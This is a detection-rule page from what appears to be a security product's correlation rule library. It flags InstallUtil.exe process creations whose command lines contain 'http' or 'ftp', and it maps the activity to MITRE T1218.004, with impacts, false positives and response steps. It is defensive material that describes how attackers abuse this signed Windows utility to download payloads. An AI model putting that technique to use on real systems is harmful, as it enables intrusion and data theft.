- Home
- Correlation Rule Library
- Use of InstallUtil for Download
Use of InstallUtil for Download
Rule added on 30th May, 2024In this page
Rule type:
Correlation
Rule description:
InstallUtil.exe is a legitimate Windows utility part of the .NET framework. It is used by system administrators to install and uninstall server resources by executing specific methods within the .NET binaries.
However, it may also be used by attackers to carry out malicious activities such as downloading and executing malicious payloads.
Attack chain scenario: Phishing -> Malicious attachment -> InstallUtil-based download -> Data theft
Impact:
It can impact the organizations in the following ways:
- Data theft
- Unauthorized access to resources
- System compromise
Data source:
Windows > Process Creation
Required configuration: The rule is based on the process creation and termination. Prerequisites required are installing and configuring Sysmon, enabling audit process creation audit policy, and the command line auditing.
Relevant MITRE ATT&CK techniques and tactics:
Tactic: TA0005- Defense Evasion
Technique: T1218- System Binary Proxy Execution
Sub Technique: T1218.004- InstallUtil
Criteria:
( ( Process Name endswith installutil.exe ) OR ( ORIGINALFILENAME endswith "installutil.exe" ) ) AND ( ( Command Line contains "http" ) OR ( Command Line contains "ftp" ) )
Attackers may use installutil.exe to install and execute malicious files.
http- Used for interacting with web servers to download files.
ftp- Used for the transfer of files and data.
When to enable this rule:
Enabling this rule will help you meet the security standards' requirements listed below:
Security standards (NIST CSF 2.0):
DE.CM-09: Computing hardware and software, runtime environments, and their data are monitored to find potentially adverse events
When this rule is triggered, you're notified when .NET InstallUtil.exe application is used to download arbitrary files.
This enables you to monitor the use of commands such as InstallUtil.exe.
Known false positives: This event may be generated by administrators to perform legitimate downloads to update .net assembly.
Next steps:
When this alert is triggered, the following measures can be implemented:
- Identification: Identify if the alert is a new incident or part of an existing incident.
- Analysis: Analyze the impact and extent of the compromise to comprehend the severity of the attack.
- Response: Respond promptly by initiating an automated workflow to cease the malicious process.
- Implement Principle of Least Privilege: Restrict the privileges of using InstallUtil .exeto certain authorized users only.
